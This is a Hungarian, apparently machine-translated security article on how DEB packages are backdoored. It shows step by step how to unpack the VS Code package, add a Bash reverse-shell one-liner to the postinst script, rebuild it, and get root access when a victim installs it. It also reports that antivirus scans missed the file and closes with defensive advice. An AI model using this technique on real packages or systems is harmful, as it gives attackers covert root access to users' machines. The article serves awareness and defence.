Tudta, hogy a támadók módosíthatják a DEB-fájlba csomagolt szkripteket, hogy illetéktelenül hozzáférhessenek a számítógépéhez? A DEB-csomagok hátulsó ajtóként vannak kialakítva.
Kulcs elvitelek
- A DEB-csomagok könnyen háttérajtóval zárhatók, így a támadók rosszindulatú kódot juttathatnak a rendszerbe, amikor root jogosultsággal telepíti őket.
- A fertőzött DEB-csomagokat nehéz felismerni, mivel előfordulhat, hogy nem jelölik meg őket víruskereső szoftverek vagy felhőmegoldások, például a VirusTotal.
- Saját védelme érdekében kerülje a DEB csomagok véletlenszerű oldalakról való letöltését, ragaszkodjon a hivatalos letöltési oldalakhoz ill a közösség által megbízható webhelyeken, és fontolja meg a biztonsági eszközök telepítését, hogy megvédje Linux rendszerét a hálózattól támadások.
A DEB fájlok olyan szoftvercsomagok, amelyek a Debian-alapú Linux disztribúciók szoftverszállításának elsődleges formátumai.
A DEB-csomagok telepítéséhez olyan csomagkezelőt kell használnia, mint a dpkg, root jogosultságokkal. A támadók kihasználják ezt, és hátsó ajtókat fecskendeznek be ezekbe a csomagokba. Ha a dpkg-mal vagy bármely más csomagkezelővel telepíti őket, a rosszindulatú kód is lefut a rendszerrel együtt, és veszélyezteti a rendszert.
Vizsgáljuk meg pontosan, hogyan vannak a DEB-csomagok hátsó ajtajában, és mit tehet önmaga védelmében.
Hogyan történik a DEB-csomagok hátsóajtója?
Mielőtt megértené, hogy a DEB-csomagok hogyan vannak hátsó ajtóval ellátva, vizsgáljuk meg, mi van egy DEB-csomagban. A bemutató kedvéért letöltöm a Microsoft Visual Studio Code DEB csomagot a Microsoft hivatalos webhelyéről. Ez ugyanaz a csomag, amelyet akkor tölt le, ha a VS Code-ot Linuxra szeretné telepíteni.
Letöltés:Visual Studio kód
Most, hogy letöltötte a célcsomagot, ideje kicsomagolni. A DEB csomagot a dpkg-deb parancsot a -R zászló, majd a tartalom tárolásának elérési útja:
dpkg-deb -R Ennek ki kell bontania a VS Code csomag tartalmát.
A mappába lépve több könyvtárat is találunk, de érdeklődésünket csak a DEBIAN Könyvtár. Ez a könyvtár karbantartói szkripteket tartalmaz, amelyek a telepítés során root jogosultsággal futnak le. Ahogy már rájöttél, a támadók módosítják a szkripteket ebben a könyvtárban.
A bemutató kedvéért módosítom a postinst szkriptet, és adjunk hozzá egy egyszerű egysoros Bash fordított TCP-héjat. Ahogy a neve is sugallja, ez egy szkript, amely a csomag rendszerre telepítése után fut le.
Parancsokat tartalmaz, amelyek véglegesítik a konfigurációkat, például szimbolikus hivatkozások beállítása, függőségek kezelése és egyebek. Rengeteg különböző fordított héjat találhat az interneten. A legtöbbjük ugyanúgy fog működni. Íme a fordított shell egysoros minta:
bash -i >& /dev/tcp/127.0.0.1/42069 0>&1A parancs magyarázata:
- bash: Ez az a parancs, amely meghívja a Bash parancsértelmezőt.
- -én: A jelző utasítja a Bash-t, hogy interaktív módban fusson, lehetővé téve a valós idejű parancs I/O-t.
-
>& /dev/tcp/ip/port: Ez átirányítja szabványos kimenet és standard hiba hálózati aljzatba, lényegében TCP-kapcsolatot létesítve a
és . - 0>&1: Ez átirányítja a bemenetet és a kimenetet ugyanarra a helyre, azaz a hálózati aljzatba.
Az avatatlanok számára a fordított shell egy olyan kódtípus, amely a célgépen végrehajtva visszakapcsol a támadó gépéhez. A fordított héjak nagyszerű módja a tűzfal korlátozásainak megkerülésének, mivel a forgalmat a tűzfal mögötti gép generálja.
Így néz ki a módosított szkript:
Amint látja, minden ugyanaz, de csak egy sor került hozzáadásra, vagyis a mi Bash fordított shellünk. Most vissza kell építenie a fájlokat a ".deb" formátumban. Egyszerűen használja a dpkg parancsot a --épít zászló vagy használat dpkg-deb a... val -b zászló, majd a kivont tartalom elérési útja:
dpkg --build
dpkg-deb -b Most a hátsó ajtós DEB-csomag készen áll a rosszindulatú webhelyekre való szállításra. Szimuláljunk egy olyan forgatókönyvet, amelyben az áldozat letöltötte a DEB csomagot a rendszerére, és úgy telepíti, mint bármely más szokásos csomagot.
A felső terminálablak az áldozat POV-ja, az alsó pedig a támadó POV-ja. Az áldozat telepíti a csomagot sudo dpkg -i és a támadó türelmesen figyeli a bejövő kapcsolatokat a netcat parancs Linux alatt.
Amint a telepítés befejeződött, vegye észre, hogy a támadó megkapja a fordított shell-kapcsolatot, és most már root hozzáféréssel rendelkezik az áldozat rendszeréhez. Most már tudja, hogyan vannak a DEB-csomagok háttérajtóval. Most megtudjuk, hogyan védheti meg magát.
Hogyan lehet észlelni, ha egy DEB-csomag rosszindulatú
Most, hogy tudja, hogy a fertőzött DEB-csomagok egy dolognak számítanak, bizonyára azon töpreng, hogyan lehet megtalálni a fertőzötteket. Kezdetnek megpróbálhatja a Linux víruskereső szoftver mint a ClamAV. Sajnos, amikor a ClamAV vizsgálatot futtatták a csomagon, az nem jelölte meg rosszindulatúként. Íme a szkennelés eredménye:
Tehát ha nincs prémium víruskereső megoldása (ami nem garancia arra, hogy ne kerüljön feltörésre), meglehetősen nehéz észlelni a rosszindulatú DEB-csomagokat. Próbáljunk meg egy felhőmegoldást, például a VirusTotal webhelyet használni:
Mint látható, a VirusTotal nem észlelt semmi hibát. Nos, az egyetlen módja annak, hogy megvédje magát az ilyen fenyegetésekkel szemben, ha betartja az alapvető biztonsági higiéniát, például ne töltsön le fájlokat ismeretlen forrásból, mindig egy fájl kivonatának ellenőrzése, és általában kerülni kell az árnyékos szoftverek telepítését.
Az internet tele van ilyen fenyegetésekkel. Az egyetlen módja annak, hogy az adatok elvesztése nélkül böngésszen, ha tisztában van veled, és megbízható webhelyeket böngész. Ezenkívül Linux esetén azt is meg kell próbálnia megkeresni, hogy a letöltött szoftver rendelkezik-e AppImage változat mivel önállóak és homokozóba helyezhetők, így távol tarthatók a rendszerrel.
Ne töltsön le DEB-csomagokat véletlenszerű webhelyekről!
A DEB-csomagok nem eleve rosszak, azonban a támadók könnyen felfegyverkezhetik és elküldhetik a gyanútlan felhasználóknak. Amint látható, a DEB-csomag egyszerűen megnyitható és módosítható egyéni kód hozzáadásához, mindössze néhány paranccsal, így ez a rosszindulatú programok szállításának általános vektora.
Még a DEB csomagok egyszerű hátsó ajtóit sem érik el a legjobb víruskereső megoldások. Tehát a legjobb, ha biztonságosan játszol, a józan eszeddel szörfölsz az interneten, és mindig csak a hivatalos letöltőoldalakról vagy a közösség által megbízható webhelyekről tölthet le szoftvert.
Most, hogy tisztában van azokkal a biztonsági kockázatokkal, amelyek a DEB-csomagok új vagy ismeretlen webhelyekről történő telepítésével járnak, óvatosnak kell lennie az új szoftverek telepítésekor. Azonban nem elég csak odafigyelni arra, hogy mit telepít. Az Ön Linux rendszere hálózati támadások célpontja is lehet.
Annak érdekében, hogy hálózati támadás esetén biztonságban legyen, érdemes hálózati biztonsági eszközök telepítését megfontolni.
